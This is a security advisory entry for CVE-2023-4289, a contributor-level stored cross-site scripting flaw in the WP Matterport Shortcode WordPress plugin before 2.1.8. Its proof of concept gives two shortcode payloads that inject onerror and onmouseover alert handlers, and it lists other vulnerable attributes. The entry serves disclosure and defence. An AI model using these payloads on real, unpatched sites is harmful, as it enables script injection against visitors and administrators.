WP Matterport Shortcode < 2.1.8 – Contributor+ Stored XSS via shortcode | CVE 2023-4289 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the following shortcodes in the page/post and view/preview it

[matterport src="test" width='1 " onerror="alert(/XSS1/)']
[matterport src="test" window='"onmouseover=alert(/XSS2/)//'] (and move the mouse over the generated block to trigger the XSS)

Other affected attributes: height, help, hl, qs, brand, lang, hhl, kb, lp, title, tourcta, maxzoom, minzoom, zoomtrans, mpv, filter, minimapfilter, copyright, ga, aa

Affects Plugins

shortcode-gallery-for-matterport-showcase

Fixed in 2.1.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4289-wp-matterport-shortcode-2-1-8-contributor-stored-xss-via-shortcode

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

38c337c6-048f-4009-aef8-29c18afa6fdc

Timeline

Publicly Published

2023-09-25 (about 2 years ago)

Added

2023-09-25 (about 2 years ago)

Last Updated

2023-09-26 (about 2 years ago)

Other

Published

Title

Published

2024-03-13

Title

Elementor Addons by Livemesh < 8.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Team Members Widget

Published

2024-11-21

Title

Ajax Search Lite < 4.12.4 - Admin+ Stored XSS

Published

2022-05-23

Title

Newsletter < 7.4.5 - Reflected Cross-Site Scripting

Published

2023-02-13

Title

i2 Pros & Cons <= 1.3.1 - Contributor+ Stored XSS

Published

2021-07-21

Title

Charitable - Donation Plugin < 1.6.51 - Unauthenticated Stored Cross-Site Scripting